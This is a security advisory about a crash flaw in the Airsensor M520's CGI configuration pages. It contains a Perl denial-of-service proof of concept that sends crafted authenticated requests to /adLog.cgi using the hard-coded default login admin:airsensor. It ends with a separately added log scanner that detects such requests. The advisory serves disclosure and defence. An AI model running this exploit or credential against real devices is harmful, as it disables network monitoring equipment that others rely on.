The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
SUMMARY
A vulnerability in the Airsensor M520 is caused by an unspecified error in
the filter of the CGI files used to configure device properties. It can be
exploited by sending a specially crafted HTTPS request (authentication is
required), which causes the HTTPS service on the system to crash.
DETAILS
Exploit:
#!/usr/bin/perl -w
# Overflow PoC
# Model = M520
#
# Register dump from the sensor at the time of the crash, as reported by the author:
# Instruction)
# v0=0x00000000 v1=0x00000000
# a2=0x00000010 a3=0x00000041
# t2=0x0000000b t3=0x00000000
# t6=0x0066a1a4 t7=0x4df0e494
# s2=0x802f7910 s3=0x80120000
# s6=0x80120000 s7=0x80128afc
# k0=0x802f78c8 k1=0x802f7910
# fp=0x80128aec ra=0x800b2534
# exception = 0x800b2534
# exception occurred = 0x00000000
# address
# address
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;

my $string  = "%41%41%41";               # String to send (URL-encoded "AAA")
my $method  = 'GET';                     # Method "GET" or "POST"
my $uri     = 'https://192.168.100.100'; # Factory default IP address
my $content = "/adLog.cgi?";             # CGI file to crash
#my $content = "/ad.cgi?";
#my $content = "/post.cgi?";
#my $content = "/logout.cgi?";

# Header field names are given without a trailing colon; HTTP::Headers adds it.
my $headers = HTTP::Headers->new(
    'Host'            => '192.168.100.100',
    'User-Agent'      => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',
    'Accept'          => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
    'Accept-Language' => 'en-us,en;q=0.5',
    'Accept-Charset'  => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
    'Keep-Alive'      => '300',
    'Connection'      => 'keep-alive',
    'Referer'         => 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh',
    'Authorization'   => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encoding of admin:airsensor
);

# HTTP::Request->new takes (method, uri, headers, content); the CGI path and
# the string belong in the request URI, not in the body.
my $request  = HTTP::Request->new($method, $uri . $content . $string, $headers);
my $ua       = LWP::UserAgent->new;
my $response = $ua->request($request);

print "[+] Denial of Service exploit for Airsensor M520 Final\n";
print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n";
print "[+] We got this response from sensor: \n\n" . $response->content . "\n";

# The sensor answers with '&'-separated key=value pairs (e.g. RESULT=...&RESPMSG=...).
my %data;
foreach my $pair (split('&', $response->content)) {
    my ($k, $v) = split('=', $pair, 2);
    $data{$k} = $v if defined $k;
}

# An absent RESULT (empty or no response) is treated as 0, i.e. as a crash.
my $result = defined $data{RESULT} ? $data{RESULT} : 0;
if ($result != 0) {
    print "[+] Denial of Service exploit for Airsensor M520 Final\n";
    print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n";
    print "[+] Use:\n";
    print "\tperl -x dos_sensor.pl\n";
    print(($data{RESPMSG} || '') . "\n");
    exit(0);
} else {
    print "[+] Denial of service exploit succeeded!!!\n";
    print "[+] By Alex Hernandez [ahernandez\@sybsecurity.com]\n";
}
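A defensive counterpart, added here as an example and not part of the advisory or the author's PoC: it scans web-server access log lines for requests to the CGIs the PoC names whose percent-decoded query string is oversized or contains non-printable bytes. It assumes Common Log Format lines (the sample lines are constructed) and a query-length threshold that is an assumption, not a value from the advisory.

```python
import re
from urllib.parse import unquote, urlsplit

# CGI endpoints the advisory's PoC names as crash targets.
AFFECTED_CGIS = {"/adLog.cgi", "/ad.cgi", "/post.cgi", "/logout.cgi"}

# Common Log Format request line (assumed log shape, not documented by the advisory).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def inspect(line, max_query=64):
    """Return a finding for one log line, or None if it is not suspicious.
    Flags requests to an affected CGI whose decoded query is longer than
    max_query (assumed threshold) or contains non-printable bytes."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path not in AFFECTED_CGIS:
        return None
    decoded = unquote(parts.query)  # undo %41-style encoding before measuring
    reasons = []
    if len(decoded) > max_query:
        reasons.append(f"decoded query length {len(decoded)} > {max_query}")
    if any(not 0x20 <= ord(c) <= 0x7E for c in decoded):
        reasons.append("non-printable bytes in decoded query")
    if not reasons:
        return None
    return {"src": m.group("src"), "user": m.group("user"), "path": parts.path,
            "status": m.group("status"), "reasons": reasons}


def scan(lines, max_query=64):
    """Apply inspect() to every line and return only the findings."""
    return [f for f in (inspect(l, max_query) for l in lines) if f]


# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = [
    '192.168.100.5 - admin [01/Jan/2008:10:00:00 +0000] "GET /adLog.cgi?submitButton=refresh&refresh=Refresh HTTP/1.1" 200 512',
    '192.168.100.5 - admin [01/Jan/2008:10:00:01 +0000] "GET /adLog.cgi?' + "%41" * 100 + ' HTTP/1.1" 500 0',
    '192.168.100.5 - admin [01/Jan/2008:10:00:02 +0000] "GET /status.cgi?' + "%41" * 100 + ' HTTP/1.1" 200 12',
    '192.168.100.5 - admin [01/Jan/2008:10:00:03 +0000] "GET /post.cgi?x=%00%01 HTTP/1.1" 200 12',
]
```

Running scan(SAMPLE_LOG) reports the second and fourth lines only; a 500 status on an affected CGI right after such a request is the signature of the crash the advisory describes.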
ADDITIONAL INFORMATION
The information has been provided by Alex Hernandez <mailto:[email protected]>.